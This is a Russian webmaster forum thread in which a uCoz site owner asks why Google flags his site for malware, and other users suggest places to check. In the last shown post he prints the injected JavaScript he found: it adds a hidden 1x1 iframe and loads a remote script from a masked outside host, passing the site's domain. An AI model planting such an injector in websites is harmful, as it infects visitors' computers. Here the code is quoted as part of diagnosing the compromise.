X   Сообщение сайта
(Сообщение закроется через 3 секунды)



 

Здравствуйте, гость (

| Вход | Регистрация )

2 страниц V   1 2 >
Открыть тему
Тема закрыта
> Google определил вредоносное ПО на сайте, хотя его там нет!
HanDi
HanDi
Topic Starter сообщение 13.11.2012, 18:09; Ответить: HanDi
Сообщение #1


Сабж. Как это произошло? Проверил весь код на сайте, все отдельные скрипты, модули, файлы, все страницы, проверил все.
Проверил сайт googlebot'ом, как посоветовал сам гугл.

Хотя гугл ругается на неизвестный сайт, типа:

Google Chrome заблокировал доступ к этой странице на сайте ***.ru
На эту веб-страницу было вставлено содержание с golop******.tk, известного распространителя вредоносного ПО. Ее посещение может привести к заражению вашего компьютера вредоносным ПО.


Заходил даже с оперы, с ИЕ - ничего.

Что это такое произошло?
0
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
Proofer
Proofer
сообщение 13.11.2012, 18:11; Ответить: Proofer
Сообщение #2


(HanDi @ 13.11.2012, 20:09) *
Проверил весь код на сайте, все отдельные скрипты, модули, файлы, все страницы, проверил все.

Всё всё проверили? Iframe нет нигде? htaccess чист?
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
HanDi
HanDi
Topic Starter сообщение 13.11.2012, 18:18; Ответить: HanDi
Сообщение #3


Сайт ucoz, посему htaccess - откидываем.
Iframe отсутствуют.
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
Belos
Belos
сообщение 13.11.2012, 18:21; Ответить: Belos
Сообщение #4


base64 ?
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
HanDi
HanDi
Topic Starter сообщение 13.11.2012, 18:31; Ответить: HanDi
Сообщение #5


Проверил на webmaster yandex - вредоносный код отсутствует.

Помоему это что-то гугл мудрит.

base64 тоже я думаю откидываем, у меня нет ничего зашифрованного в коде.
+ проверил все js файлы, обычно там что-то прячут.
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
Belos
Belos
сообщение 13.11.2012, 18:44; Ответить: Belos
Сообщение #6


Но проверить то можно, что стоит то?!
Total Comander -> Alt+F7 + с текстом base64
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
HanDi
HanDi
Topic Starter сообщение 13.11.2012, 18:46; Ответить: HanDi
Сообщение #7


Разобрался, зря гнал на гугл.

Вопрос закрыт. Всем спасибо.
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
Belos
Belos
сообщение 13.11.2012, 18:48; Ответить: Belos
Сообщение #8


Говорите уж, в чем причина была )))
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
seowolf
seowolf
сообщение 13.11.2012, 18:54; Ответить: seowolf
Сообщение #9


HanDi, бывают ломают хостера и закидывают массово всякие гадости, те в свою очередь как опомнятся - массово чистят все. Так что вы может прозевали шоутайм, посмотрите на время редактирования файлов через фтп. Гугль просто он шустрый малый, чуть что в барабаны, а яндекс и не успевает носом повести.

Блин, пока писал вопрос закрыли)) Итог то какой, в чем причина, ТС?

Сообщение отредактировал seowolf - 13.11.2012, 18:55


--------------------
Бутик драгоценных камней. Удивительные драгоценные камни.
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
HanDi
HanDi
Topic Starter сообщение 13.11.2012, 18:54; Ответить: HanDi
Сообщение #10


Дело в том, что в 1 js файле, причем по размерам в самом большом, содержался самый маленький код, в котором был еще 1 iframe с еще 1 js файлом biggrin.gif

В общем в итоге код вредоносного ПО оказался такой:

/*ffb653*/
function AddBanner(b){var a = document.createElement('iframe'); a.src = b; a.style.position = 'absolute'; a.style.border = '0'; a.style.height = '1px'; a.style.width = '1px'; a.style.left = '1px'; a.style.top = '1px'; document.body.appendChild(a);}function XRequest(data){var script=document.createElement("script");script.type="text/javascript";if(script.readyState){script.onreadystatechange=function(){if(script.readyState=="loaded"||script.readyState=="complete"){script.onreadystatechange=null;}}}else{script.onload=function(){}}script.src=data;document.getElementsByTagName("head")[0].appendChild(script)}XRequest("http://*********.info/sex/banner.php?r=1&d="+document.domain);//debug:
/*/ffb653*/


Единственное не пойму, как могли загрузить этот код, если пароли не знает никто 100% и подобрать их не реально.

seowolf, это маловероятно.. обычно у ucoz такого не случалось.

Сообщение отредактировал HanDi - 13.11.2012, 18:55
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
2 страниц V   1 2 >
Открыть тему
Тема закрыта
1 чел. читают эту тему (гостей: 1, скрытых пользователей: 0)
Пользователей: 0


Свернуть

> Похожие темы

  Тема Ответов Автор Просмотров Последний ответ
Горячая тема (нет новых ответов) Странный трафик на сайте длительное время
34 TABAK 9069 Вчера, 23:38
автор: Arsenwenger
Открытая тема (нет новых ответов) Если статья не в индексе Google - она уникальна или нет?
6 uahomka 1586 Вчера, 15:37
автор: Arsenwenger
Горячая тема (нет новых ответов) CryptoCloud — прием USDT, BTC, ETH, LTC на любом сайте
37 CryptoCLoud 10819 Вчера, 15:37
автор: CryptoCLoud
Открытая тема (нет новых ответов) Боты могут делать пушподписки на моём сайте?
3 Megaspryt 953 Вчера, 5:18
автор: Skyworker
Горячая тема (нет новых ответов) Тема имеет прикрепленные файлыБыстрый и качественный обмен на сайте Baksman.org
Обмен Bitcoin, BTC-e, PM, Qiwi, Yandex money, Карты банк
53 Baksman 33822 23.4.2024, 11:29
автор: Baksman


 



RSS Текстовая версия Сейчас: 25.4.2024, 5:20
Дизайн